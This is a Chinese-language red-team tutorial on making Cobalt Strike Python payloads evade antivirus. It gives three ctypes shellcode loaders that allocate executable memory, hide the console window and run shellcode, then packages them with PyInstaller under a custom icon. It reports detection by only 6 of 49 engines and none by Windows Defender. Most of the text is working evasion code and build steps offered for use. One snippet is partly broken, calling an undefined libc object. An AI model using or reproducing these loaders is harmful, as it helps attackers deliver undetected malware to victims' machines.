CS强化_python免杀

CS作为主流红队工具，其在后渗透中的地位自不用说，功能强大，但如何让它活下去就成了个人发挥的内容，今天我们以python payload为例展开。

payload生成

通过cs自动生成我们python payload：

值得一提的是360、电脑管家等均为对该payload报毒，倒是Windows Defender觉得事情没那么简单，显然不装杀毒软件的PC是最难搞的23333，因为它会默认开启Windows Defender。

payload执行

从公开的几例code来讨论一下，其实大同小异，都调用了ctypes第三方库，如下demo仅支持python2：

import ctypes

payload = ""
shellcode = bytearray(payload)
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                     buf,
                                     ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.c_int(ptr),
                                         ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))

接下来两例兼容python2/3：

import ctypes

shellcode =  ""
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

import ctypes

buf =  ""
#libc = CDLL('libc.so.6')
PROT_READ = 1
PROT_WRITE = 2
PROT_EXEC = 4
def executable_code(buffer):
    buf = c_char_p(buffer)
    size = len(buffer)
    addr = libc.valloc(size)
    addr = c_void_p(addr)
    if 0 == addr: 
        raise Exception("Failed to allocate memory")
    memmove(addr, buf, size)
    if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
        raise Exception("Failed to set protection on buffer")
    return addr
VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
VirtualProtect = ctypes.windll.kernel32.VirtualProtect
shellcode = bytearray(buf)
whnd = ctypes.windll.kernel32.GetConsoleWindow()   
if whnd != 0:
       if 1:
              ctypes.windll.user32.ShowWindow(whnd, 0)   
              ctypes.windll.kernel32.CloseHandle(whnd)
memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
old = ctypes.c_long(1)
VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
                                     buf,
                                     ctypes.c_int(len(shellcode)))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()

payload封装

当然了，我们可无法保证所有的目标机都装有python环境，所以我们借助打包工具来进行打包，但缺点显而易见，生成的木马文件体积较大，但作为入门免杀我们暂且接受这一点。
常见Python打包工具有三种py2exe、PyInstaller和cx_Freeze等。笔者此处以PyInstaller为例。
然而值得吐槽的有两点：

• 1、pyinstaller对py3环境的打包极不友好，bug层出，需要参考官方issue手动下载而非pip自动安装，但即使如此依然存在bug，所以最终笔者选择了打包py2环境。
• 2、pyinstaller打包的可执行程序在win7/server2008R2均测试良好，但win10/server2016均无响应或报错，所以在实际使用前请在与目标机尽可能相同的环境中预调试。

#安装
pip install pyinstaller
#打包
pyinstaller -F -w -i rabbit.ico payload.py

参数说明：

-F，-onefile 产生单个的可执行文件
-w，--windowed，--noconsolc   指定程序运行时不显示命令行窗口（仅对 Windows 有效）
-i,  指定图标

根据上述三种code方案生成了三个mua文件，大小4M内，勉强接受。

win7/2008R2测试上线，全部通过：

最后，是我们关注的免杀问题：
在virscan提供的49款AV中，仅6款报毒。

Windows Defender亦不会报毒：

免责声明

本文内容仅适用于红队，请勿用于任何未授权测试。